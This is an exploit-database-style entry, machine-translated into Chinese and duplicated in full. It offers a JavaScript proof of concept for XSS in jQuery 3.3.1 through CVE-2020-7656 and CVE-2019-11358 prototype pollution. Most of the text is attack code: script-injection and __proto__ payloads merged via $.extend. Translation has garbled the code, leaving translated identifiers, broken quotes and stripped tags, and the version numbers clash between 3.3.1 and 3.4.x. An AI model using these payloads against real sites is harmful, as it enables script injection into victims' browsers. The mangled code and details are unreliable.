#利用标题: jQuery原型污染XSS Exploit(CVE-2019-11358 CVE-2020-7656)
#Google Dork: N/A
#日期: 2025-02-13
#利用作者: xoryus
#供应商HomePage: https://jquery.com
#软件link: https://code.jquery.com/jquery-3.3.1.min.js
#版本: 3.3.1
#测试在: Windows 10,Ubuntu 20.04,Chrome 120,Firefox 112
#CVE : CVE-2019-11358,CVE-2020-7656
#类别: WebApps
#Description:
#这种利用滥用JQuery:中的两个漏洞
#-CVE-2020-7656: XSS通过不正确的脚本处理
#-CVE-2019-11358:原型污染导致XSS
#通过使用jQuery 3.4.x将有效载荷注入脆弱的页面,攻击者可以在受害者的浏览器中执行任意JavaScript。
#
#USAGE:
#1。将此脚本加载到包含jQuery 3.3.1的页面中
#2。通过脚本注入和原型污染观察两个XS警报。
#POC(概念证明):
#----------------------------------------------------------
/*
* CVE-2020-7656和CVE-2019-11358的利用
*使用jQuery 3.4.x将恶意JavaScript注入脆弱的页面
*/
在网站和浏览器控制台(F12)中复制所有有效载荷和插入
//1。加载脆弱的jQuery(版本3.3.1)
const script=document.createelement('script');
script.src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js';
document.head.appendchild(脚本);
//2。加载jQuery后要执行的功能
script.onload=function(){
console.log('[+]脆弱的jQuery加载!');
//3。注入XSS的恶意内容(CVE-2020-7656)
const maliccontent='scriptalert('xss通过cve-2020-7656:' + document.domain)/脚本'; //句子之后的空间
$('身体')。附加(恶意性);
console.log('[+] XSS有效载荷(CVE-2020-7656)注入。将显示警报。');
//4。利用原型污染(CVE-2019-11358)
const defaultConfig={
'Backlink':'a href='https://example.com'go back/a'
};
const malicalparams={
'__proto __': {
'Backlink':'Svg Onload=alert=alert('XSS通过CVE-2019-11358:原型污染!')''
}
};
//5。使用脆弱的$ .extend合并对象
令config=$ . extend(true,defaultConfig,malicparams);
console.log('[+]通过$ .EXTEND()执行的原型污染。');
//6。创建一个容器来注入恶意内容
const容器=document.createelement('div');
container.id='BacklinkContainer';
document.body.body.appendchild(容器);
//7。将恶意内容注入DOM
$('#BacklinkContainer').html(config.backlink);
console.log('[+] XSS有效载荷(CVE-2019-11358)注入DOM。将显示警报。');
};
//8。指令消息
console.log('[*]脚本注入。等待jQuery加载.');
#Google Dork: N/A
#日期: 2025-02-13
#利用作者: xoryus
#供应商HomePage: https://jquery.com
#软件link: https://code.jquery.com/jquery-3.3.1.min.js
#版本: 3.3.1
#测试在: Windows 10,Ubuntu 20.04,Chrome 120,Firefox 112
#CVE : CVE-2019-11358,CVE-2020-7656
#类别: WebApps
#Description:
#这种利用滥用JQuery:中的两个漏洞
#-CVE-2020-7656: XSS通过不正确的脚本处理
#-CVE-2019-11358:原型污染导致XSS
#通过使用jQuery 3.4.x将有效载荷注入脆弱的页面,攻击者可以在受害者的浏览器中执行任意JavaScript。
#
#USAGE:
#1。将此脚本加载到包含jQuery 3.3.1的页面中
#2。通过脚本注入和原型污染观察两个XS警报。
#POC(概念证明):
#----------------------------------------------------------
/*
* CVE-2020-7656和CVE-2019-11358的利用
*使用jQuery 3.4.x将恶意JavaScript注入脆弱的页面
*/
在网站和浏览器控制台(F12)中复制所有有效载荷和插入
//1。加载脆弱的jQuery(版本3.3.1)
const script=document.createelement('script');
script.src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js';
document.head.appendchild(脚本);
//2。加载jQuery后要执行的功能
script.onload=function(){
console.log('[+]脆弱的jQuery加载!');
//3。注入XSS的恶意内容(CVE-2020-7656)
const maliccontent='scriptalert('xss通过cve-2020-7656:' + document.domain)/脚本'; //句子之后的空间
$('身体')。附加(恶意性);
console.log('[+] XSS有效载荷(CVE-2020-7656)注入。将显示警报。');
//4。利用原型污染(CVE-2019-11358)
const defaultConfig={
'Backlink':'a href='https://example.com'go back/a'
};
const malicalparams={
'__proto __': {
'Backlink':'Svg Onload=alert=alert('XSS通过CVE-2019-11358:原型污染!')''
}
};
//5。使用脆弱的$ .extend合并对象
令config=$ . extend(true,defaultConfig,malicparams);
console.log('[+]通过$ .EXTEND()执行的原型污染。');
//6。创建一个容器来注入恶意内容
const容器=document.createelement('div');
container.id='BacklinkContainer';
document.body.body.appendchild(容器);
//7。将恶意内容注入DOM
$('#BacklinkContainer').html(config.backlink);
console.log('[+] XSS有效载荷(CVE-2019-11358)注入DOM。将显示警报。');
};
//8。指令消息
console.log('[*]脚本注入。等待jQuery加载.');